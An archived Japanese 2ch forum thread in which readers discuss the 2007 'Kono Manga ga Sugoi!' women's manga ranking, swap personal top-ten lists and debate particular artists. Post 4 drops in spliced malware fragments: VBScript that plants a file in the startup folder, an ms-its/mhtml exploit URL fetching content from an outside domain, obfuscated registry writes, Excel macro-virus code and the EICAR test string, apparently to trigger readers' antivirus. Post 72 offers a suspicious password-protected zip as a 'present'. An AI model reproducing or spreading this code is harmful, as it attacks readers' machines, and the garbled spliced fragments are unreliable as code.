2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

このマンガがすごい! 2007・オンナ版

1 :花と名無しさん:2006/12/09(土) 18:42:32 ID:???0
語りましょう

2 :花と名無しさん:2006/12/09(土) 18:49:30 ID:QWXVPfVS0


3 :花と名無しさん:2006/12/09(土) 19:43:18 ID:???0
他スレにあった。

宝島社「このマンガがすごい!2007年 オンナ版」

 1「ハチミツとクローバー」羽海野チカ
 2「君に届け」椎名軽穂
 3「のだめカンタービレ」二ノ宮知子
 4「リストランテ・パラディーソ」オノ・ナツメ
 5「舞姫 テレプシコーラ」山岸涼子
 6「夏目友人帳」緑川ゆき
 7「NANA」矢沢あい
 8「フラワー・オブ・ライフ」よしながふみ
 9「暴れん坊本屋さん」久世番子
 10「高校デビュー」河原和音
 11「7SEEDS」田村由美
 12「プライド」一条ゆかり
 13「桜蘭高校ホスト部」
 13「フルーツバスケット」高屋奈月
 15「4ジゲン」にざかな
 16「きせかえユカちゃん」東村アキコ
 17「大奥」よしながふみ
 18「きょうの猫村さん」ほりよしこ
 18「スキップ・ビート!」仲村佳樹
 20「会長はメイド様!」藤原ヒロ

4 :<body onload=window()>:2006/12/09(土) 22:31:48 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2006/12/09(土) 23:50:10 ID:???0
>>3
を! 昨年と微妙に変わってるね。
2006年版は、

1.『ハチミツとクローバー』
2.『のだめカンタービレ』
3.『NANA』
4.『バルバラ異界』
5.『プライド』
だった。

今年ももうそんな季節なのか。早く買いにいこ。

6 :花と名無しさん:2006/12/10(日) 09:42:30 ID:???0
4位の「リストランテ・パラディーソ」は、納得いかないなぁ。
絵は汚いし、内容も(ry
オノナツメなら「not simple」の方がマシ。

何月から何月までの統計なんだろ??

7 :花と名無しさん:2006/12/10(日) 10:01:50 ID:???0
男版のデータはどこで見れる?

8 :花と名無しさん:2006/12/10(日) 10:33:16 ID:???0
のだめとナナはやっぱ、入ってるな・・

9 :花と名無しさん:2006/12/10(日) 10:39:13 ID:???0
1「ハチミツとクローバー」羽海野チカ
3「のだめカンタービレ」二ノ宮知子
7「NANA」矢沢あい
18「スキップ・ビート!」仲村佳樹

読んだ。

10 :花と名無しさん:2006/12/10(日) 13:03:16 ID:???0
ほぼ全部読んだ事あるけど、何を基準に順位をつけたのか疑問
1作品ごとに解説が載ってるんなら、買ってみようかな・・

11 :花と名無しさん:2006/12/10(日) 22:54:36 ID:???O
一応読んだけどハチクロが1位?汚い絵だしキャラキモいし納得いかね〜
映画の影響かね

12 :花と名無しさん:2006/12/10(日) 22:58:37 ID:???0
読んだのは
1「ハチミツとクローバー」羽海野チカ
2「君に届け」椎名軽穂
9「暴れん坊本屋さん」久世番子
12「プライド」一条ゆかり
16「きせかえユカちゃん」東村アキコ

の5つだけだなぁ。


13 :花と名無しさん:2006/12/12(火) 08:50:26 ID:???0
どれも納得いかね〜オノナツメが一番納得いかね〜

14 :花と名無しさん:2006/12/12(火) 12:18:44 ID:???0
「このマンガがすごい!2007年 ワタクシ版」でも書けばよい。

15 :花と名無しさん:2006/12/12(火) 19:03:18 ID:???0
なんかそっちの方が面白そうだな。

16 :花と名無しさん:2006/12/13(水) 21:22:54 ID:???0
>>13は、今年何が面白かったの?

17 :花と名無しさん:2006/12/13(水) 21:50:42 ID:???0
13じゃないけど、私はこんな感じ。(順不同)

1「君に届け」椎名軽穂
2「春行きバス」宇佐美真紀
3「レディー・ヴィクトリアン」もとなおこ
4「天の鳥 花の夢」江平洋巳
5「あのことぼくのいえ」タアモ
6「あの山越えて」夢路行
7「砂時計」芦原妃名子
8「世界を敵に回しても」斉藤倫
9「よかおなご入門」穂月想多
10「モンキー・パトロール」有間しのぶ

まぁ、自分でもなんとも言いがたいラインナップだw

18 :花と名無しさん:2006/12/13(水) 23:12:41 ID:???0
>>17
3・6・9・10の作品、知らないなぁ。
読んでみるから、>>17は「7SEEDS」と「のだめ」をぜひ読んでくれ。

19 :花と名無しさん:2006/12/14(木) 22:00:05 ID:???O
入ってなくて意外なもの
キャットストリート
スプラウト
僕の初恋を君にささぐ
ホタルノヒカリ
今年うれてきてたから

ライフ
賞とったから

20 :花と名無しさん:2006/12/14(木) 22:21:54 ID:???0
>>19
あ、それ全部同意。
このスレ見てると、今年は結構面白いマンガが多かったんだとわかるね。

21 :花と名無しさん:2006/12/14(木) 22:41:12 ID:???0
このなかで読後感のよい大人っぽい話ってあります?
こてこての純愛漫画はあまり好きじゃないんだけど。
田村由美の作品はストーリーがしっかりしていて昔から好きです。


22 :花と名無しさん:2006/12/14(木) 23:02:56 ID:???0
私もキャットストリート入ってないのが以外だった

23 :花と名無しさん:2006/12/14(木) 23:18:46 ID:???0
>4位「リストランテ・パラディーソ」オノ・ナツメ
  ・
  ・
  ・
  ・

 ( ゚д゚ )


24 :花と名無しさん:2006/12/15(金) 01:09:17 ID:???0
ハチクロそんなにいいとも思えんしなー

25 :花と名無しさん:2006/12/15(金) 01:10:04 ID:???0
よかった時期もなくもなかったが
終り頃は最悪だったからなあ<ハチクロ

26 :花と名無しさん:2006/12/15(金) 02:52:02 ID:???O
オノナツメって誰って感じ
キャットストリートは話題にならないよね
人気コミックとしてもあがらないし
そういう私もあまりおもしろくないけど。
チョイスしてる人がウエブ管理人とかだからマニアックだ

27 :花と名無しさん:2006/12/16(土) 00:30:24 ID:???0
>チョイスしてる人がウエブ管理人

そうなんだ?世論調査並みの集計をとった訳では無いのか・・。
そうとわかれば、このおかしなランキング結果でも、納得w

28 :花と名無しさん:2006/12/16(土) 20:16:10 ID:???0
私版

1「砂時計」芦原妃名子
2「君に届け」椎名軽穂
3「学園アリス」樋口橘
4「ハチミツとクローバー」羽海野チカ
5「しゃにむにGO」羅川真里茂
6「7SEEDS」田村由美
7「キラメキ☆銀河町商店街」ふじもとゆうき
8「働きマン」安野モヨコ
9「のだめカンタービレ」二ノ宮智子
10安野モヨコのショート

10は松尾スズキの責任編集の雑誌で描いてたもの。
8Pくらい?だったけど、私小説っぽくてすごく良かった


29 :花と名無しさん:2006/12/16(土) 20:31:35 ID:???0
うん、砂時計は派手ではないがいい漫画だと思うな

30 :花と名無しさん:2006/12/17(日) 22:22:48 ID:???0
>>28
ハチクロは終わり方が最悪だったし、働きマンはどこが良いのかわからん。
あとの作品には賛同だけど、ホント人それぞれだね。
私もマイベスト考えてみようかな。暇だしw

31 :花と名無しさん:2006/12/17(日) 23:35:52 ID:???O
働きマンをよくないと言う人がいることに驚き。
私は君に届け、砂時計がかなり普通のよくあるマンガに思えてつまらない
リストランテはまったく読む気もしなかった
働きマン、大奥、プライドがおもしろい。

32 :花と名無しさん:2006/12/18(月) 00:23:49 ID:???0
働きマンは普通に面白いと思うな
すききらいはあるだろうけどね
砂時計はオーソドックスなんだけど
なんだろう、こう、持久力がある感じ
普通のものをちゃんと書いているあたりに実力を感じるというか

33 :花と名無しさん:2006/12/18(月) 18:52:46 ID:???0
働きマンはとてもいいマンガだと思うけど、
読んでるうちに「それに比べて、自分、なにやってんだ・・・」って
気分になってくるから、精神衛生上よろしくない。

34 :花と名無しさん:2006/12/18(月) 19:47:57 ID:???0
>>30
目がでかすぎて絵がきもいので
私も安野さんの漫画は苦手です。

でも>>33のレスを見て、一度読んでみたくなりましたw

35 :花と名無しさん:2006/12/19(火) 05:19:09 ID:9KZrlj0IO
あの、おたずねしたいのですが
のだめみたいにセックルシーンがなくて主人公が高校生以上で
純粋〜なかんじな面白い漫画教えて頂けないでしょうかm(__)m

36 :花と名無しさん:2006/12/19(火) 05:42:10 ID:i/KPuop70
へー君届がのだめ押しのけて2位か。
このマンガもなんかドラマ化されそうだな

37 :花と名無しさん:2006/12/19(火) 07:17:59 ID:???0
内容無しエロばっかのせいか小学館の漫画が少ないね
僕等がいたと砂時計はあってもいいかも…ってくらいかな

38 :花と名無しさん:2006/12/19(火) 07:57:43 ID:???O
>>35
スレ違い。
図書館スレに行く→決まり事をよく読む→依頼する→返事がもらえる。

少女漫画図書館Part11
http://comic6.2ch.net/test/read.cgi/gcomic/1156442294/

39 :花と名無しさん:2006/12/19(火) 11:28:19 ID:???0
>>35
ハツカレでも読んどけば
つか、純粋〜って……

40 :花と名無しさん:2006/12/19(火) 11:38:29 ID:???0
いい年こいて「純粋〜」は支持者もセットでキモがられたりもするよなあ。
ハチクロとか。

41 :花と名無しさん:2006/12/19(火) 11:48:37 ID:???0
セックルしてなきゃ純粋っていうのも
大雑把なくくり方だとは思うけどね
まあ、お子さんに読ませようとかいう意図なのかもだけど

42 :花と名無しさん:2006/12/19(火) 15:43:18 ID:???0
「このマンガがすごい!」であって、「このマンガがすごく良い!」ではない
なら、
>5「舞姫 テレプシコーラ」山岸涼子

は、ある意味納得。
あのバッサリいき方はすごかった。スレも当時は大騒ぎだったもんね。

43 :花と名無しさん:2006/12/19(火) 23:04:26 ID:???0
>>42
なるほど!そう考えれば、
オノナツメのランクインも納得でき・・・ねーよwww

44 :花と名無しさん:2006/12/20(水) 00:07:15 ID:SD4olXS9O
スレちがいすみませんですた
ありがとうございます
いってきます

45 :花と名無しさん:2006/12/20(水) 00:12:36 ID:???0
溺れるナイフが入ってないorz

46 :花と名無しさん:2006/12/20(水) 00:14:31 ID:???0
>>42
ハライタスwwww

オノ、嫌いじゃないけど自分探し・コミティア臭がキツイから
それ系読みなれていない人には何が良いのかわかんないだろうし
ましてやランク4位ってありえん
書店員のスレを読んだら、オノプッシュ戦略が展開されているようなので
それの関係もあるんじゃない?>ランク
あと、コミティア出身作家は読者と距離が近いせいか、
秋葉出身オタ専用アイドルよろしく、信者のプッシュもすごいんだよね
「アタシが〇〇君をホストNO1にしてあげる」ってカンジで
選考者がウェブ管理人って納得

47 :花と名無しさん:2006/12/20(水) 00:27:36 ID:???0
>>45
>>3に入ってる漫画を見ると、ちょいマニア受け重視みたいだし
溺れるナイフ入っててもおかしくないのにね

48 :花と名無しさん:2006/12/20(水) 00:57:27 ID:???0
何気によしながふみが2作品入ってる件
よしながふみは西洋〜しか読んだことないけど読んでみようかな

49 :花と名無しさん:2006/12/20(水) 01:04:33 ID:???0
>>48
「フラワー・オブ・ライフ」は、もうすぐ連載完結らしいです。
「大奥」はコミクス2巻発売中で、今月末発売『メロディ(隔月誌)』で2巻続きが
掲載されます。2作とも西洋とは全然違った印象の作品だと思う。

>>3の中で、一条のプライドはなんで入ってんのが不思議だ。
一条読者だけど、よくある一条漫画で特に注目すべき面白い展開なんて
あまり感じられないけどなー。
フルバは連載完結ご祝儀みたいなもん?一応風呂敷畳んだようだが、
中だるみ禿しくて飽きちゃったよ。

この中の未読作品で気になるのは「暴れん坊本屋さん」ぐらいだ。

50 :花と名無しさん:2006/12/20(水) 04:46:23 ID:???O
オノナツメ自体は、注目すべき?作家だとは思うんだけど、これだ!って作品がないんだよね。
だから何とか取り上げる為に、一応少女漫画と呼べるリストランテをねじ込んだって感じ。

51 :花と名無しさん:2006/12/20(水) 11:48:24 ID:???O
オノナツメは、メガネ男子ブーム(?)という今年らしさを出したのかと思った。
割と好きだけど高く評価されすぎとは思う。
私も書店員のプッシュ!!みたいなコーナーで初めて知って
手に取ったけど雰囲気漫画だよね。その雰囲気は悪くないが。

52 :花と名無しさん:2006/12/20(水) 14:09:34 ID:???0
テーマ別オススメ!イチオシ作品ガイドの『ロック漫画部門』で
「NANA」「机をステージに」「3-THREE-」が紹介されてたけど
そのラインナップだったら「EXIT」も入れてほしかった…

53 :花と名無しさん:2006/12/20(水) 21:54:12 ID:???0
オノナツメが肩身の狭い思いをしているスレは、ココですか?

54 :花と名無しさん:2006/12/20(水) 22:34:33 ID:???0
肩身が狭いってか、元々マイナー・サブカル系でしょ。
もしこの先売れたとしても飛ぶ鳥落とす勢いだの
肩で風切るだのは考えにくいし、こういうランキング系で名前が挙がるのは
ちょっと違和感あるっつーか。

漫画好き著名人数十人による今年の漫画ベスト○○みたいなので
複数人が取りあげたのなら、別に何とも思わんだろうけどね。

55 :花と名無しさん:2006/12/21(木) 00:40:09 ID:???0
>>51
私も『店員のおススメコーナー』で大絶賛だったから、つい買ったorz
結構、いろんな本屋さんでおススメされてるんだね。

>>53
はい、ココですw

56 :花と名無しさん:2006/12/21(木) 09:48:50 ID:???0
オノナツメだったらbasso名義のクマとインテリは
凝ってて面白いと思う。ホモマンガだけれど・・・

57 :花と名無しさん:2006/12/21(木) 11:08:16 ID:???O
オノナツメ全部?持ってるけどクマとインテリが一番すきw
顔漫画だしちょとあざといけど、とっても魅力的。

58 :花と名無しさん:2006/12/21(木) 14:36:22 ID:???0
自分的ランク

1「のだめカンタービレ」
2「大奥」
3「テレプシコーラ」
4「「スケルトン イン ザ クローゼット」
5「7SEEDS」
6「学園アリス」
7「デーモン聖典」
8「ごくせん」
9「潔く柔く」
10「百鬼夜行抄」



59 :花と名無しさん:2006/12/21(木) 19:32:16 ID:???0
>>58
恋愛メインの漫画が少ないね。
つーか、4位のマンガ知らないや。

60 :花と名無しさん:2006/12/21(木) 19:34:42 ID:???0
>>52
それ自分もオモタ。
ロックがテーマならあれは入ってておかしくないと思うのに。

しかも本文中に
「ロックをまともに題材として捕らえた少女漫画が無い」
って感じの事書いてあって(ちょっとうろ覚え)
書いた奴、EXIT読んだ事無いだろゴルァ、と引っかかった。

61 :花と名無しさん:2006/12/21(木) 19:42:43 ID:???0
森脇真末味の「おんなのこ物語」も読んだことが無いんだろう。

62 :花と名無しさん:2006/12/21(木) 20:06:30 ID:???0
>>59
確か月刊「フラワーズ」で連載中。

63 :花と名無しさん:2006/12/22(金) 11:12:19 ID:???0
>>52
「EXIT」は古い上にマイナーなのかもしれん
作者もあまり有名ではないしな
自分は割と好きだったが

>>62
もう連載はしてない
短編集でコミックスになってる
岩本ナオは地味だがじんわりするいい話しが多い

64 :花と名無しさん:2006/12/22(金) 12:53:56 ID:???0
>>60
>>52の面子なら入ってておかしくないと私も思った ノシ
ロックがテーマの漫画なら秀逸だと思う。9巻とか鳥肌立った。

>>63
EXIT、初出は古いけど各誌を転々としつつ現在もスピカで連載中だよ。
藤田作品は秀作多いと思うけど今の漫画界ではマイナーなのかな…。




65 :花と名無しさん:2006/12/22(金) 13:32:40 ID:???0
連載中だったのか!知らなかったよ
今度読んでみよう

66 :花と名無しさん:2006/12/24(日) 22:59:41 ID:???O
EXITはモロBOWYって酷評する人もいるね。
その辺はよく知らないけど、私は藤田作品の中で一番つまらなかった。
あれだけコミックス売った。

67 :花と名無しさん:2006/12/25(月) 07:18:11 ID:???O
大きなビートの木の下で
というBOФWY自伝を読んだら、エピソードまんまだという事が判るよ

68 :花と名無しさん:2006/12/25(月) 18:20:25 ID:???0
モロBOWYだな
でも好きな人はそれも含めて好きなんじゃないのか?
いくえみとかもそうだが、あまりにそのまんまだと
同人誌見てるような感じがして自分はどうしても引いてしまうが

69 :花と名無しさん:2006/12/25(月) 22:29:17 ID:???0
去年結構いい位置にいた漫画が大幅ランクダウンしてたりして面白い

70 :花と名無しさん:2006/12/25(月) 22:43:00 ID:???0
ベスト10前年度ランキング→今年のランキング
1位 ハチミツとクローバー→1位(←)
2位 のだめカンタービレ→3位(↓)
3位 NANA→7位(↓)
4位 バルバラ異界→ランク外(↓)
5位 プライド→12位(↓)
6位 大奥→17位(↓)
7位 フラワー・オブ・ライフ→8位(↓)
8位 きせかえユカちゃん→16位(↓)
9位 シュガシュガルーン→65位(↓)
10位 舞姫テレプシコーラ→5位(↑)

1位キープのハチクロとテレプシコーラ以外は皆下げてるんだね
今年のランキングは全体的にやや意外なのが高ランクだった印象

71 :花と名無しさん:2006/12/26(火) 00:52:09 ID:???0
ハチクロ、前年度1位なのはわかるけど、
あんな終わり方をした今年も1位ってのは、納得いかない。

72 :花と名無しさん:2006/12/26(火) 04:43:53 ID:HCuUBIvg0
           ,..-‐ ´ ̄ ''ー-.__
         /:::::::::::::::::::::::::::::::::::::>⌒ヽ
          /::::::::::::::::::::::::::::::::::!:/ 弋__ノ
       ./::::::::::::::::::::::::::::::::::::::l
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ヽ
      ゝ________ノ
       ! ∠.._;'____\   |
      ,!イ く二>,.、 <二>`\.、ヽ.
     /'´レ--‐'ノ. `ー---- 、 |\ ヽ、
    \  `l  (!"      Jfヽ!  `''-;ゝ 
      `‐、jヽ ヾニニ>   ゙イ" }_,,. ‐''´  私からのプレゼントだ
         `´\  ー   / ,ィ_}
.          |_ `ー ''´ _」'
        _,.| ~||「  ̄ 人|、._
  ,r==;"´  ヽ ミ|||彡   / ` ー`==、-、
. ///,イ  ___ ヽ|||_,,. ‐''´___  | | | |ヽ

ttp://vegetation.o0o0.jp/pochi/upload.html
jyuuyon23291.zip
パス utaware


73 :花と名無しさん:2006/12/26(火) 10:26:33 ID:???0
ランキングに入っているにもかかわらず、後の頁で
スルーされている漫画がある件について。
(ex.「チェリージュース」)

74 :花と名無しさん:2006/12/26(火) 11:42:32 ID:???0
>チェリージュース
そんなの、20位以内に入ってなくね?

75 :花と名無しさん:2006/12/26(火) 11:44:53 ID:???O
>>74
ごめん。ベスト100関連のはなしをしてるとオモタ。
100絡みだと「アニコン」もスルーされてる。

76 :74:2006/12/26(火) 11:57:58 ID:???0
>>75
ベスト100まであったのか!
>>3のランキングで全部なんだと思ってたよ、スマソ。

全部知りたいから、今から買ってくるわ ノ

77 :花と名無しさん:2006/12/26(火) 13:54:39 ID:???0
ランキング、65位までしか載ってないんだけど…

78 :花と名無しさん:2006/12/26(火) 20:06:24 ID:???0
んで、65位は誰なの?

79 :花と名無しさん:2006/12/26(火) 21:03:34 ID:???0
自分で買ってきて読め。


…というか65位が11作品もあるから打つの面倒。
50位くらいから後ろは、二人が推せばランクインするような点数だし。

80 :花と名無しさん:2006/12/26(火) 22:07:22 ID:???0
このスレを見て、オノと安野の漫画を買って、
後悔しまくっている私が通りますよ。

81 :花と名無しさん:2006/12/26(火) 22:54:53 ID:???0
>>74
しかもチェリジュが入っていたのは2006年版。
サルベージトークでの話でスルーされていたのが印象に残った。、

82 :花と名無しさん:2006/12/27(水) 03:28:04 ID:???O
オノがこんなに上位なのに鈴菌は…

83 :花と名無しさん:2006/12/27(水) 11:14:26 ID:???0
鈴菌は少女漫画じゃねーだろ
乙女漫画だけどターゲットは男じゃね?

84 :花と名無しさん:2006/12/27(水) 14:35:18 ID:???0
>>82
論外。ターゲットが男でも、コミハイだったらまだしも・・・

85 :花と名無しさん:2006/12/27(水) 19:59:33 ID:???0
オノナツメの人気に嫉妬w

86 :花と名無しさん:2006/12/28(木) 07:32:51 ID:???0
少コミ系がほぼスルーされている点についてw
エロ漫画として大人におススメされているものだとばかり思ってたが

87 :花と名無しさん:2006/12/28(木) 13:07:31 ID:???O
ネタとして読むとすればロリ嗜好の道程だけじゃ?>性コミ
いくら宝島でも、そこまで下卑た内容にはしないだろうw

88 :花と名無しさん:2006/12/28(木) 16:22:41 ID:???0
性コミに、今年のベストに挙がるような作品があるとは思えない。
エロばっかりで内容スカスカ。

89 :花と名無しさん:2006/12/28(木) 18:26:12 ID:???O
立ち読みだからうろ覚えだけどまゆタソに1ページ使われてなかった?

90 :花と名無しさん:2006/12/28(木) 19:03:56 ID:???0
それはヒドい・・・

91 :花と名無しさん:2006/12/28(木) 19:56:04 ID:???0
>>89
『羨ましいシチュエーションの恋愛漫画』紹介の
「オレ様」の項目で紹介されてた。

92 :花と名無しさん:2006/12/29(金) 09:08:17 ID:???0
>『羨ましいシチュエーションの恋愛漫画』紹介の
>「オレ様」の項目で紹介されてた。

プ あの手のマンガって恥ずかしいよね
  表紙見るだけでもキツイ

93 :花と名無しさん:2006/12/29(金) 11:03:18 ID:???0
【羨ましいシチュエーションの恋愛漫画】
『先生』〜想い人は先生!生徒のひとりでいたくない!〜
 「おとなの時間」山田こもも
 「シンクロオンチ!」きら
 「英会話スクールウォーズ」マツモトトモ
 「積極―愛のうた―」谷川史子
『きょうだい』〜きょうだい、だけど好き 許されない恋かもしれないけど…〜
 「お兄ちゃんと一緒」時計野はり
 「そんなんじゃねえよ」和泉かねよし
 「世界を敵に回しても」斉藤倫
『同居』〜突然の同居生活 急接近がまき起こす恋の嵐〜
 「恋なんかはじまらない」藤原よしこ
 「スイートオアシス」秋里和国
 「オレンジ・プラネット」フクシマハルカ
 「ラブ・ベリッシュ!」春田なな
『オレ様』〜オレ様だけど憎めない ワガママと純粋さのギャップにときめく〜
 「SEX=LOVE2」新條まゆ
 「天然系☆王子」藤沢志月
 「ラブニスタ」香代乃

項目のアオリ文がなんともアレだな…


94 :花と名無しさん:2006/12/29(金) 11:20:28 ID:???0
香代乃って盗作スレが出来てる人だね
まだ漫画家やってるんだすげー根性

95 :花と名無しさん:2006/12/29(金) 15:10:49 ID:???0
まゆタンと香代乃のオレ様男は、単なる薄っぺらいワガママ男なんで
全然ときめかない。

96 :花と名無しさん:2006/12/29(金) 19:15:00 ID:???0
>>95
>オレ様男
標準語亀田みたいなやつか?

97 :花と名無しさん:2006/12/30(土) 01:23:52 ID:???0
>>96
えっとですね、こんな男です。
ttp://ma-ru.sakura.ne.jp/mayutan.html

98 :花と名無しさん:2006/12/30(土) 10:22:24 ID:+feVYR+N0
>>97 
>まゆタンと香代乃のオレ様男は、単なる薄っぺらいワガママ男

たしかにみんな頭悪そうな人ばっかり

99 :花と名無しさん:2007/01/03(水) 22:09:49 ID:lZQyVUnE0
test


100 :花と名無しさん:2007/01/03(水) 23:24:31 ID:???O
100ゲトー(・∀・)

101 :花と名無しさん:2007/01/10(水) 17:52:03 ID:69owB94H0
ほしゅ

102 :花と名無しさん:2007/01/10(水) 17:57:48 ID:???O
香代乃が描く女はなんか一昔前の絵っぽい…

103 :花と名無しさん:2007/01/10(水) 19:57:53 ID:54PajOox0
リボンの騎士<香代乃が描く女

104 :花と名無しさん:2007/01/12(金) 02:33:41 ID:???0
>>103
手塚に謝れw

105 :花と名無しさん:2007/01/20(土) 12:25:22 ID:???O
あと三日で小学館漫画賞が発表らしいけど
この雑誌の品評は反映されるのでしょうか

106 :花と名無しさん:2007/01/20(土) 12:39:53 ID:???0
小学館漫画賞って売り上げの部数で中味は関係ないとか?

107 :花と名無しさん:2007/01/20(土) 12:54:10 ID:???0
小学館漫画賞って
出来るだけ小学館、ちょと広げて一ツ橋グループ内で出来るだけ決めようって感じ。
一ツ橋以外からの受賞作だとホントに凄いとは思う。

108 :花と名無しさん:2007/01/21(日) 17:30:03 ID:???0
小学館漫画賞の歴代受賞者&受賞作品を見てきた。

>>107
一ツ橋グループ以外では、『王家の紋章』と『ケロロ軍曹』が過去受賞してるね。
あと、『ゴルゴ13』が2回受賞してる!スゴス

ttp://comics.shogakukan.co.jp/mangasho/rist.html

109 :花と名無しさん:2007/01/21(日) 20:20:33 ID:???O
それなりに経歴長くないと受賞しないっぽいね
デビューから10年くらい、もしくはヒットが二作品ないと
駄目みたい
講談社は逆に新人でも取ってる

110 :花と名無しさん:2007/01/23(火) 00:12:10 ID:???0
>108
ベルバラ、エースを狙え、柄亀は揚げそびれたのか?動物のお医者さんもないし

小学館で描いてるととってももらいやすい気がするけど、なんでその作品で?ってヒトもけっこういるな。

111 :花と名無しさん:2007/01/23(火) 01:30:23 ID:???0
>>110
確かにそういう有名作品が抜けてるね。
やっぱり小学館の作品が優先なんだろうなぁ。

漫画賞を開設してない集英社や白泉社のマンガは厳しいね。
あ、日本漫画家協会賞があるか。
ttp://www.nihonmangakakyokai.or.jp/jushou.html

112 :花と名無しさん:2007/01/24(水) 12:15:54 ID:+wHN+cO40
のだめとハチクロ人気だなー

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)